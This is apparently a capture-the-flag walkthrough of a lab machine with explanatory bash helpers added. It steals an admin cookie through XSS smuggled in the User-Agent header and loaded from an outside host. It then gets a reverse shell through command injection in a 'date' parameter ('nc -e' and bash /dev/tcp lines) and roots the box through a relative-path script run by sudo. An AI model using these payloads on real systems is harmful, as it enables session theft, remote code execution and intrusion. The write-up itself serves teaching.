The support page has a form we can use to message staff. Submitting an XSS payload in the message field (a bare `<script>` is enough) does not send the message; it returns an error page instead.

The filter only looks at the form fields, though. The User-Agent header is not sanitised and is reflected along with the flagged request, so we have XSS there. The request below triggers the error with `message=<script>` while carrying the real payload in User-Agent:

POST /support HTTP/1.1
Host: 10.10.11.8:5000
User-Agent:<script src="http://10.10.14.22/script.js"></script> 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Origin: http://10.10.11.8:5000
Connection: close
Referer: http://10.10.11.8:5000/support
Cookie: is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs
Upgrade-Insecure-Requests: 1

fname=test&lname=test&email=test%40test.com&phone=333333333&message=<script>

Using our notes from the XSS lab we create a script.js and an index.php on our machine. Whoever renders the flagged request (the admin, judging by the cookie we get back) loads script.js from 10.10.14.22; the script sends document.cookie to index.php in the `c` parameter, and index.php logs it. We receive:

c=is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
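
Before using the stolen value it is worth seeing what is actually in it. The `is_admin` cookie has the `<payload>.<signature>` shape of a Flask/itsdangerous signed value: the first segment is unpadded URL-safe base64 of the JSON payload, the second is an HMAC over it. As an added example, not part of the original writeup, the bash helper below decodes both cookie values from this page. Our own cookie decodes to `"user"` and the stolen one to `"admin"`; the 27-character signature matches the length of an unpadded base64 SHA-1 digest, itsdangerous' default. Because the payload is only signed, not encrypted, we can read it, but we cannot rewrite `"user"` to `"admin"` ourselves without the server's secret key, which is why the XSS theft is needed.

```bash
#!/bin/bash
# Added example (not from the original writeup): inspect a Flask/itsdangerous
# signed cookie value of the form <url-safe-base64 payload>.<signature>.

# Return the decoded payload. Accepts either "is_admin=<value>" or "<value>".
cookie_payload() {
  local value="${1#*=}"            # drop the "name=" part if present
  local payload="${value%%.*}"     # segment before the first dot
  # itsdangerous strips the '=' padding, so restore it before base64 -d,
  # and map the URL-safe alphabet (-_) back to the standard one (+/).
  local pad=$(( (4 - ${#payload} % 4) % 4 ))
  while [ "$pad" -gt 0 ]; do
    payload="${payload}="
    pad=$((pad - 1))
  done
  printf '%s' "$payload" | tr '_-' '/+' | base64 -d
}

# Return the signature segment. It is an HMAC of the payload; the 27 chars
# seen here are the length of an unpadded base64 SHA-1 digest, which is the
# itsdangerous default, so the value cannot be forged without the secret key.
cookie_signature() {
  local value="${1#*=}"
  printf '%s' "${value#*.}"
}

# Print both halves of a cookie, e.g. straight from the cookie-catcher log.
inspect_cookie() {
  local raw="$1"
  echo "payload:   $(cookie_payload "$raw")"
  echo "signature: $(cookie_signature "$raw")"
}

# Our own session cookie vs the one stolen from the admin (values from the writeup):
inspect_cookie 'is_admin=InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs'
inspect_cookie 'is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0'
```

The same helper works on any cookie produced by itsdangerous' `Signer`; a `TimestampSigner` value would have a third dot-separated segment holding the timestamp.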

With the admin's is_admin cookie set in our browser we can now access /dashboard.

The dashboard's report generator gives us straightforward command injection: the `date` parameter is passed to a shell unsanitised, so appending `;` followed by a command executes it on the server.

Payload for a reverse shell, with a listener waiting on 10.10.14.22:9999. Note that `nc -e` only works with a netcat build that supports `-e` (netcat-traditional or ncat); if the target's nc lacks it, a `bash -c 'bash -i >& /dev/tcp/10.10.14.22/9999 0>&1'` payload does the same job.

POST /dashboard HTTP/1.1
Host: 10.10.11.8:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 246
Origin: http://10.10.11.8:5000
Connection: close
Referer: http://10.10.11.8:5000/dashboard
Cookie: InVzZXIi.uAlmXlTvm8vyihjNaPDWnvB_Zfs; is_admin=ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
Upgrade-Insecure-Requests: 1

date=2023-09-15;nc -e /bin/sh 10.10.14.22 9999

Checking our sudo rights as dvir, we can run /usr/bin/syscheck as root. It is a bash script:

dvir@headless:/tmp/pwn$ cat /usr/bin/syscheck
#!/bin/bash

if [ "$EUID" -ne 0 ]; then
 exit 1
fi

last_modified_time=$(/usr/bin/find /boot -name 'vmlinuz*' -exec stat -c %Y {} + | /usr/bin/sort -n | /usr/bin/tail -n 1)
formatted_time=$(/usr/bin/date -d "@$last_modified_time" +"%d/%m/%Y %H:%M")
/usr/bin/echo "Last Kernel Modification Time: $formatted_time"

disk_space=$(/usr/bin/df -h / | /usr/bin/awk 'NR==2 {print $4}')
/usr/bin/echo "Available disk space: $disk_space"

load_average=$(/usr/bin/uptime | /usr/bin/awk -F'load average:' '{print $2}')
/usr/bin/echo "System load average: $load_average"

if ! /usr/bin/pgrep -x "initdb.sh" &>/dev/null; then
 /usr/bin/echo "Database service is not running. Starting it..."
 ./initdb.sh 2>/dev/null
else
 /usr/bin/echo "Database service is running."
fi

When I first looked at this, I noticed it runs a file without a full path, as we see here: `./initdb.sh 2>/dev/null`. Because the script runs as root but resolves `./initdb.sh` against the caller's current working directory (which sudo does not change), an `initdb.sh` we place in a directory we control gets executed as root. The `pgrep -x "initdb.sh"` guard is satisfied as long as no process by that name is already running, and the `2>/dev/null` means that if the exec fails we get no error at all.
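
As an added example, not from the original writeup, the bash walkthrough below shows the mechanics of that line and why a planted initdb.sh that is not executable fails silently. `mock_syscheck` is a stand-in for the vulnerable line of /usr/bin/syscheck so this runs locally without sudo; on the target you cd into the directory holding your initdb.sh and run `sudo /usr/bin/syscheck`. The payload here only writes a marker file; the actual reverse shell is not shown on this page, so substitute your own.

```bash
#!/bin/bash
# Added example (not from the original writeup): why ./initdb.sh in syscheck
# is exploitable, and why it silently does nothing when the planted file
# lacks the execute bit.

# Plant initdb.sh in a directory we control. The body is a harmless marker
# here; on the target this would be the reverse shell.
plant_payload() {
  local dir="$1"
  cat > "$dir/initdb.sh" <<'EOF'
#!/bin/sh
echo "initdb.sh executed as uid $(id -u)" > ./marker
EOF
}

# Stand-in for the vulnerable line in /usr/bin/syscheck. sudo keeps the
# caller's working directory, so the root-run script resolves ./initdb.sh
# against whatever directory we cd'd into.
mock_syscheck() {
  ./initdb.sh 2>/dev/null
}

# Run the stand-in from $dir; success means initdb.sh really executed.
run_from() {
  local dir="$1"
  rm -f "$dir/marker"
  ( cd "$dir" && mock_syscheck ) || true
  [ -f "$dir/marker" ]
}

# Full sequence: without +x the exec fails with "Permission denied", which
# 2>/dev/null hides; after chmod +x it runs.
demo() {
  local dir
  dir=$(mktemp -d)
  plant_payload "$dir"
  if run_from "$dir"; then
    echo "unexpected: ran without the execute bit"
  else
    echo "without chmod +x: nothing happened and no error was shown"
  fi
  chmod +x "$dir/initdb.sh"
  if run_from "$dir"; then
    echo "after chmod +x: $(cat "$dir/marker")"
  fi
  rm -rf "$dir"
}

demo

# On the target the same steps against the real binary are:
#   cd /tmp/pwn && chmod +x initdb.sh && sudo /usr/bin/syscheck
```

A quick `ls -l initdb.sh` (or `[ -x initdb.sh ]`) before running sudo is the check that would have saved the hours described below.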

I created a rev shell but I forgot to chmod +x it, so it never worked. I then figured this wasn't the right path and spent hours looking elsewhere and couldn't find anything.

I looked up a guide and saw he had done what I did, but ran chmod first. Once I did that the exploit worked. I am an idiot.